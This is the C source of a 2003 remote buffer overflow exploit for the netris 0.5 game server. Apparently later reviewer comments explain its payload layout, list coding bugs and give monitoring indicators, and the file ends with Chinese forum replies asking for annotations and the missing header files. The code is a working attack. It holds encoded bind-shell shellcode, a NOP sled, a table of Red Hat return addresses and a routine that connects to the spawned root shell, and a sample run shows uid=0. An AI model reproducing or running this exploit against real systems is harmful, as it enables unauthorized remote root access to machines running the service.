/*********************************************************************************\
 * [ netris[v0.5]:server remote buffer overflow exploit(new: all redhat os).
 * by jsk from Ph4nt0m Security Team
 * jsk@ph4nt0m.net chat with us ( irc.0x557.org #ph4nt0m)
 * Greets vade79 and all #ph4nt0m members
 * [root@localhost tmp]# ./pst-netex -h 127.0.0.1 -p 9284 -t 2
 *
 * netris[v0.5]:server remote buffer overflow exploit(new)
 * by jsk.
 * Greets vade79 and all #ph4nt0m .
 * [+] Hostname: 127.0.0.1
 * [+] Port num: 9284
 * [+] Retaddr address: 0x8051444
 * [1] #1 Set codes.
 * [1] #1 Set socket.
 *[*] attempting to connect: 127.0.0.1:9284.
 *[*] successfully connected: 127.0.0.1:9284.
 * [1] #1 Send codes.
 * [1] #3 Get shell.
 *[*] checking to see if the exploit was successful.
 *[*] attempting to connect: 127.0.0.1:45295.
 *[*] successfully connected: 127.0.0.1:45295.
 *
 *Linux localhost.localdomain 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686
 *i686 i386 GNU/Linux
 *uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6 (di
\*********************************************************************************/

/*
 * NOTE(review): 2003-era proof of concept against the netris 0.5 server,
 * preserved here as a historical artefact. As far as this listing shows it
 * (1) fills a 12800-byte buffer with one repeated 32-bit return address,
 *     then overwrites its head with 68 filler bytes, a 4096-byte 0x90 sled
 *     and the "shell" bytes,
 * (2) sends the whole buffer to the target port in a single write(), and
 * (3) one second later dials port 5074 on the same host and bridges the
 *     local stdin/stdout to that socket.
 * The return address comes from a fixed per-distribution table, so the
 * technique depends on a predictable, non-randomised address layout.
 * From a monitoring standpoint the observable pattern is a single large
 * write to the service port followed shortly by an inbound connection to
 * a second, non-service port on the same host.
 */

/*
 * Headers. <string.h>, <stdlib.h> and <arpa/inet.h> are not included, so
 * memset/strncpy/strlen/memcpy, atoi/malloc/exit and inet_addr are used
 * without prototypes (implicit declaration, pre-C99 behaviour).
 */
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>

#define BUFSIZE 12800              /* size of the payload sent to the server   */
#define D_PORT 9284                /* default target port                      */
#define D_HOST "www.ph4nt0m.net"   /* placeholder host; -h is required (see main) */
#define TIMEOUT 10                 /* seconds allowed for each connect()       */

/*
 * Raw machine code as a C string. The author's label says it is a bind
 * shell on port 45295 (the sample run above connects to that port). The
 * bytes are later copied with strlen(), so the string must not contain
 * 0x00 — it does not.
 */
static char shell[]= /* bindshell(45295)&, netric/S-poly. */
"\x57\x5f\xeb\x11\x5e\x31\xc9\xb1\xc8\x80\x44\x0e\xff\x2b\x49\x41\x49\x75"
"\xf6\xeb\x05\xe8\xea\xff\xff\xff\x06\x95\x06\xb0\x06\x9e\x26\x86\xdb\x26"
"\x86\xd6\x26\x86\xd7\x26\x5e\xb6\x88\xd6\x85\x3b\xa2\x55\x5e\x96\x06\x95"
"\x06\xb0\x25\x25\x25\x3b\x3d\x85\xc4\x88\xd7\x3b\x28\x5e\xb7\x88\xe5\x28"
"\x88\xd7\x27\x26\x5e\x9f\x5e\xb6\x85\x3b\xa2\x55\x06\xb0\x0e\x98\x49\xda"
"\x06\x95\x15\xa2\x55\x06\x95\x25\x27\x5e\xb6\x88\xd9\x85\x3b\xa2\x55\x5e"
"\xac\x06\x95\x06\xb0\x06\x9e\x88\xe6\x86\xd6\x85\x05\xa2\x55\x06\x95\x06"
"\xb0\x25\x25\x2c\x5e\xb6\x88\xda\x85\x3b\xa2\x55\x5e\x9b\x06\x95\x06\xb0"
"\x85\xd7\xa2\x55\x0e\x98\x4a\x15\x06\x95\x5e\xd0\x85\xdb\xa2\x55\x06\x95"
"\x06\x9e\x5e\xc8\x85\x14\xa2\x55\x06\x95\x16\x85\x14\xa2\x55\x06\x95\x16"
"\x85\x14\xa2\x55\x06\x95\x25\x3d\x04\x04\x48\x3d\x3d\x04\x37\x3e\x43\x5e"
"\xb8\x60\x29\xf9\xdd\x25\x28\x5e\xb6\x85\xe0\xa2\x55\x06\x95\x15\xa2\x55"
"\x06\x95\x5e\xc8\x85\xdb\xa2\x55\xc0\x6e";

/* One row of the target table below. */
struct op_plat_st {
  int op_plat_num;     /* index shown to the user and passed via -t        */
  char *op_plat_sys;   /* human-readable distribution label                */
  u_long retaddr;      /* address written throughout the payload           */
  int off_st;          /* never read anywhere in this file                 */
};

/*
 * Per-distribution return addresses (base + 2116). The table has 4 rows
 * and no terminating sentinel. Note that "__pl_form" is a reserved
 * identifier (leading double underscore) in standard C.
 */
struct op_plat_st __pl_form[]= {
  {0,"red 7.1",0x08051e20+2116,0},
  {1,"red 7.2(cmp)",0x08051d60+2116,0},
  {2,"red 8.0 (Compile)",0x08050c00+2116,0},
  {3,"red 9.0 (Compile)",0x08058d8c+2116,0},
};

void banrl();
void x_fp_rm_usage(char *x_fp_rm);
unsigned short sock_connect(char *,unsigned short);
void getshell(char *,unsigned short);
void printe(char *,short);

/*
 * SIGALRM handler: a connect() that outlives TIMEOUT is fatal. printe()
 * calls fprintf()/exit(), which are not async-signal-safe.
 */
void sig_alarm(){printe("alarm/timeout hit.",1);}

/* Print the banner. */
void banrl() {
  fprintf(stdout,"\n netris[v0.5]:server remote buffer overflow exploit(new)\n");
  fprintf(stdout," by jsk.\n");
  fprintf(stdout," Greets vade79 and all #ph4nt0m .\n");
}

/*
 * Print usage and the target table, then exit(0).
 *
 * x_fp_rm: argv[0], used in the usage text.
 *
 * The help text lists "-s [addr]" but the getopt() string in main() has no
 * 's'. The table loop stops only on op_plat_num == 0x82; no row carries
 * that value, so the loop reads past the 4-element __pl_form (undefined
 * behaviour) — TODO confirm intended sentinel.
 */
void x_fp_rm_usage(char *x_fp_rm) {
  int __t_xmp=0;
  fprintf(stdout,"\n Usage: %s -[option] [arguments]\n\n",x_fp_rm);
  fprintf(stdout,"\t -h [hostname] - target host.\n");
  fprintf(stdout,"\t -p [port] - port number.\n");
  fprintf(stdout,"\t -s [addr] - &shellcode address.\n\n");
  fprintf(stdout," Example> %s -h target_hostname -p 8000 -t num\n",x_fp_rm);
  fprintf(stdout," Select target number>\n\n");
  for(;;) {
    if(__pl_form[__t_xmp].op_plat_num==(0x82)) break;
    else {
      fprintf(stdout,"\t {%d} %s\n",__pl_form[__t_xmp].op_plat_num,__pl_form[__t_xmp].op_plat_sys);
    }
    __t_xmp++;
  }
  fprintf(stdout,"\n");
  exit(0);
}

/*
 * Entry point: parse -t/-h/-p, build the payload, send it, then try to
 * reach the second port. Exits 0 on every path except the -i flag (-1).
 */
int main(int argc,char *argv[]) {
  int port=D_PORT;
  char hostname[0x333]=D_HOST;
  int whlp,type=0;
  unsigned int i=0;
  char *buf;
  int sd;
  u_long retaddr=__pl_form[type].retaddr;   /* default: table row 0 */
  (void)banrl();
  while((whlp=getopt(argc,argv,"T:t:H:h:P:p:IiXx"))!=EOF) {
    extern char *optarg;
    switch(whlp) {
      case 'T': case 't':
        /* Bound is 6 but the table has 4 rows: -t 4 / -t 5 index past it. */
        if((type=atoi(optarg))<6) { retaddr=__pl_form[type].retaddr; }
        else (void)x_fp_rm_usage(argv[0]);
        break;
      case 'H': case 'h':
        /* memset() plus sizeof-1 guarantees NUL termination after strncpy(). */
        memset((char *)hostname,0,sizeof(hostname));
        strncpy(hostname,optarg,sizeof(hostname)-1);
        break;
      case 'P': case 'p':
        port=atoi(optarg);
        break;
      case 'I': case 'i':
        fprintf(stderr," Try `%s -?' for more information.\n\n",argv[0]);
        exit(-1);
      case '?':
        (void)x_fp_rm_usage(argv[0]);
        break;
    }
  }
  /* -h is effectively mandatory: the D_HOST default routes to usage(), which exits. */
  if(!strcmp(hostname,D_HOST)) { (void)x_fp_rm_usage(argv[0]); }
  {
    fprintf(stdout," [+] Hostname: %s\n",hostname);
    fprintf(stdout," [+] Port num: %d\n",port);
    /* %p expects a pointer argument; retaddr is a u_long. */
    fprintf(stdout," [+] Retaddr address: %p\n",retaddr);
  }
  fprintf(stdout," [1] #1 Set codes.\n");
  if(!(buf=(char *)malloc(BUFSIZE+1))) printe("getcode(): allocating memory failed.",1);
  /* Write retaddr at every 4-byte offset (assumes 32-bit long; aliases char* as long*). */
  for(i=0;i<BUFSIZE;i+=4){*(long *)&buf[i]=retaddr;}
  memset(buf,0x78,68);                          /* 68 bytes of 'x' filler            */
  memset(buf+68,0x90,4096);                     /* 4096-byte 0x90 sled               */
  memcpy(buf+68+4096,shell,strlen(shell));      /* shell bytes; rest stays retaddr   */
  fprintf(stdout," [1] #1 Set socket.\n");
  sd=sock_connect(hostname,port);
  fprintf(stdout," [1] #1 Send codes.\n");
  write(sd,buf,BUFSIZE);                        /* single write; return value unchecked */
  close(sd);
  sleep(1);
  fprintf(stdout," [1] #3 Get shell.\n");
  /* Port 5074 here differs from the 45295 in the shell label and sample run above. */
  getshell(hostname,5074);
  exit(0);
}

/*
 * Open a TCP connection to hostname:port with a TIMEOUT-second alarm.
 * Any failure is fatal via printe(). The socket descriptor (an int) is
 * returned through an unsigned short; socket() failure (-1) is not checked.
 *
 * inet_addr() returns INADDR_NONE (all ones) on a non-numeric name, so the
 * condition below is true for any input except "0.0.0.0" and resolution is
 * redone with gethostbyname() — TODO confirm intent.
 */
unsigned short sock_connect(char *hostname, unsigned short port){
  int sock;
  struct hostent *t;
  struct sockaddr_in s;
  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  s.sin_family=AF_INET;
  s.sin_port=htons(port);
  printf("[*] attempting to connect: %s:%d.\n",hostname,port);
  if((s.sin_addr.s_addr=inet_addr(hostname))){
    if(!(t=gethostbyname(hostname))) printe("couldn't resolve hostname.",1);
    memcpy((char*)&s.sin_addr,(char*)t->h_addr, sizeof(s.sin_addr));
  }
  signal(SIGALRM,sig_alarm);
  alarm(TIMEOUT);
  if(connect(sock,(struct sockaddr *)&s,sizeof(s))) printe("netris connection failed.",1);
  alarm(0);
  printf("[*] successfully connected: %s:%d.\n",hostname,port);
  return(sock);
}

/*
 * Connect to hostname:port and relay stdin -> socket and socket -> stdout
 * with select(). A failed connect() prints a message and returns; once
 * connected, the function only leaves via exit() (remote close or a read
 * error), so the close()/return after the loop are unreachable. SIGINT is
 * ignored for the lifetime of the session. Same inet_addr() condition as
 * in sock_connect().
 */
void getshell(char *hostname,unsigned short port){
  int sock,r;
  fd_set fds;
  char buf[4096+1];
  struct hostent *he;
  struct sockaddr_in sa;
  printf("[*] checking to see if the exploit was successful.\n");
  if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) printe("getshell(): socket() failed.",1);
  sa.sin_family=AF_INET;
  if((sa.sin_addr.s_addr=inet_addr(hostname))){
    if(!(he=gethostbyname(hostname))) printe("getshell(): couldn't resolve.",1);
    memcpy((char *)&sa.sin_addr,(char *)he->h_addr, sizeof(sa.sin_addr));
  }
  sa.sin_port=htons(port);
  signal(SIGALRM,sig_alarm);
  alarm(TIMEOUT);
  printf("[*] attempting to connect: %s:%d.\n",hostname,port);
  if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
    printf("[!] connection failed: %s:%d.\n",hostname,port);
    return;
  }
  alarm(0);
  printf("[*] successfully connected: %s:%d.\n\n",hostname,port);
  signal(SIGINT,SIG_IGN);
  write(sock,"uname -a;id\n",13);   /* 13 bytes includes the terminating NUL */
  while(1){
    FD_ZERO(&fds);
    FD_SET(0,&fds);
    FD_SET(sock,&fds);
    if(select(sock+1,&fds,0,0,0)<1) printe("getshell(): select() failed.",1);
    if(FD_ISSET(0,&fds)){
      if((r=read(0,buf,4096))<1) printe("getshell(): read() failed.",1);
      if(write(sock,buf,r)!=r) printe("getshell(): write() failed.",1);
    }
    if(FD_ISSET(sock,&fds)){
      if((r=read(sock,buf,4096))<1) exit(0);   /* peer closed: terminate */
      write(1,buf,r);
    }
  }
  close(sock);
  return;
}

/*
 * Error reporter. Prints a fixed two-line message and exits with status 1
 * when e is non-zero. The err string is never printed.
 */
void printe(char *err,short e){
  fprintf(stdout," [-] Failed.\n\n");
  fprintf(stdout," Happy Exploit ! :-)\n\n");
  if(e) exit(1);
  return;
}
给出相关地址: http://www.xfocus.net/tools/200308/pst-netirsex.c.c 请流云给出注释啊，别浪费我时间 [此贴被 黄泉(acheron) 在 08月27日10时25分 编辑过]
我想最好把上面包含文件的地址也放出来吧！要不全是白搭！